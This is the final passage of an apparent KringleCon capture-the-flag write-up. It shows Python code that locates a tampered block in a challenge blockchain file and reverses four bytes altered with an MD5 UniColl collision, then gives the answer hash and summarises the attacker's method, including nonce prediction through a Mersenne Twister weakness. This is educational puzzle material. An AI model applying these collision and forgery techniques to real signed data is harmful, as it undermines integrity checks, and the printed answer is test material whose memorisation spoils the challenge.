<div class="highlight"><pre style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">jack_hash <span style="color:#666">=</span> <span style="color:#b44">&#39;58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f&#39;</span>
jack_block <span style="color:#666">=</span> None
    
blocks <span style="color:#666">=</span> Chain(load<span style="color:#666">=</span>True, filename<span style="color:#666">=</span><span style="color:#b44">&#39;blockchain.dat&#39;</span>)<span style="color:#666">.</span>blocks

<span style="color:#080;font-style:italic"># Find Jack&#39;s altered block</span>
<span style="color:#a2f;font-weight:bold">for</span> i <span style="color:#a2f;font-weight:bold">in</span> <span style="color:#a2f">range</span>(<span style="color:#a2f">len</span>(blocks)):
    curr_hash <span style="color:#666">=</span> SHA256<span style="color:#666">.</span>new()
    curr_hash<span style="color:#666">.</span>update(blocks[i]<span style="color:#666">.</span>block_data_signed())
    <span style="color:#a2f;font-weight:bold">if</span> curr_hash<span style="color:#666">.</span>hexdigest() <span style="color:#666">==</span> jack_hash:
        jack_block <span style="color:#666">=</span> <span style="color:#a2f">bytearray</span>(blocks[i]<span style="color:#666">.</span>block_data_signed())
        <span style="color:#a2f;font-weight:bold">break</span>

<span style="color:#080;font-style:italic"># Reverse the unicoll attack</span>
jack_block[<span style="color:#666">0x49</span>]  <span style="color:#666">-=</span> <span style="color:#666">1</span>
jack_block[<span style="color:#666">0x89</span>]  <span style="color:#666">+=</span> <span style="color:#666">1</span>
jack_block[<span style="color:#666">0x109</span>] <span style="color:#666">+=</span> <span style="color:#666">1</span>
jack_block[<span style="color:#666">0x149</span>] <span style="color:#666">-=</span> <span style="color:#666">1</span>

<span style="color:#080;font-style:italic"># Compute SHA256 hash of the recreated block</span>
hash_obj <span style="color:#666">=</span> SHA256<span style="color:#666">.</span>new()
hash_obj<span style="color:#666">.</span>update(jack_block)

<span style="color:#a2f;font-weight:bold">print</span>(<span style="color:#b44">&#34;SHA256: &#34;</span> <span style="color:#666">+</span> hash_obj<span style="color:#666">.</span>hexdigest())
</code></pre></div><p>Answer: <strong>fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb</strong></p>
<h2 id="conclusion">Conclusion <a href="#conclusion" class="anchor">🔗</a></h2><ul>
<li>Jack had to know the <code>nonce</code> before-hand, in order to prepare his attack. He probably exploited the Mersenne-Twister implementation weakness.</li>
<li>He used the MD5 <code>unicoll</code> collision attack to craft his malicious block</li>
<li>Once he submited the block, it was officially reviewed and signed by a valid santa signature</li>
<li>Later, at some point, he changed those 4 bytes, while keeping the blockchain integrity intact, and completely subverting the final outcome!</li>
</ul>

    </div>

    
        <div class="tags">
            
                <a href="https://knez.github.io/tags/kringlecon">kringlecon</a>
            
        </div>
    
    
     
  <div id="comment">
    
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hackerfiles" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
  </div>


</section>


    </main>
    
    <footer id="footer">
    
        <div id="social">


    <a class="symbol" href="https://github.com/knez" target="_blank">
        
        <svg fill="#bbbbbb" width="28" height="28"  viewBox="0 0 72 72" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    
    <title>Github</title>
    <desc>Created with Sketch.</desc>
    <defs></defs>
    <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
        <g id="Social-Icons---Rounded-Black" transform="translate(-264.000000, -939.000000)">
            <g id="Github" transform="translate(264.000000, 939.000000)">
                <path d="M8,72 L64,72 C68.418278,72 72,68.418278 72,64 L72,8 C72,3.581722 68.418278,-8.11624501e-16 64,0 L8,0 C3.581722,8.11624501e-16 -5.41083001e-16,3.581722 0,8 L0,64 C5.41083001e-16,68.418278 3.581722,72 8,72 Z" id="Rounded" fill="#bbbbbb"></path>
                <path d="M35.9985,13 C22.746,13 12,23.7870921 12,37.096644 C12,47.7406712 18.876,56.7718301 28.4145,59.9584121 C29.6145,60.1797862 30.0525,59.4358488 30.0525,58.7973276 C30.0525,58.2250681 30.0315,56.7100863 30.0195,54.6996482 C23.343,56.1558981 21.9345,51.4693938 21.9345,51.4693938 C20.844,48.6864054 19.2705,47.9454799 19.2705,47.9454799 C17.091,46.4500754 19.4355,46.4801943 19.4355,46.4801943 C21.843,46.6503662 23.1105,48.9634994 23.1105,48.9634994 C25.2525,52.6455377 28.728,51.5823398 30.096,50.9649018 C30.3135,49.4077535 30.9345,48.3460615 31.62,47.7436831 C26.2905,47.1352808 20.688,45.0691228 20.688,35.8361671 C20.688,33.2052792 21.6225,31.0547881 23.1585,29.3696344 C22.911,28.7597262 22.0875,26.3110578 23.3925,22.9934585 C23.3925,22.9934585 25.4085,22.3459017 29.9925,25.4632101 C31.908,24.9285993 33.96,24.6620468 36.0015,24.6515052 C38.04,24.6620468 40.0935,24.9285993 42.0105,25.4632101 C46.5915,22.3459017 48.603,22.9934585 48.603,22.9934585 C49.9125,26.3110578 49.089,28.7597262 48.8415,29.3696344 C50.3805,31.0547881 51.309,33.2052792 51.309,35.8361671 C51.309,45.0917119 45.6975,47.1292571 40.3515,47.7256117 C41.2125,48.4695491 41.9805,49.9393525 41.9805,52.1877301 C41.9805,55.4089489 41.9505,58.0067059 41.9505,58.7973276 C41.9505,59.4418726 42.3825,60.1918338 43.6005,59.9554002 C53.13,56.7627944 60,47.7376593 60,37.096644 C60,23.7870921 49.254,13 35.9985,13" fill="#FFFFFF"></path>
            </g>
        </g>
    </g>
</svg>
    </a>


</div>

    

    <p class="copyright">
    
       © Copyright 
       2021 
       <span class="split">
        <svg fill="#bbbbbb" width="15" height="15" version="1.1" id="heart-15" xmlns="http://www.w3.org/2000/svg" width="15px" height="15px" viewBox="0 0 15 15">
  <path d="M13.91,6.75c-1.17,2.25-4.3,5.31-6.07,6.94c-0.1903,0.1718-0.4797,0.1718-0.67,0C5.39,12.06,2.26,9,1.09,6.75&#xA;&#x9;C-1.48,1.8,5-1.5,7.5,3.45C10-1.5,16.48,1.8,13.91,6.75z"/>
</svg>
       </span>
       Nikola Knežević
    
    </p>
    <p class="powerby">
        Powered by <a href="http://www.gohugo.io/">Hugo</a> Theme By <a href="https://github.com/nodejh/hugo-theme-cactus-plus">nodejh</a>
    </p>
</footer>

  </body>
</html>
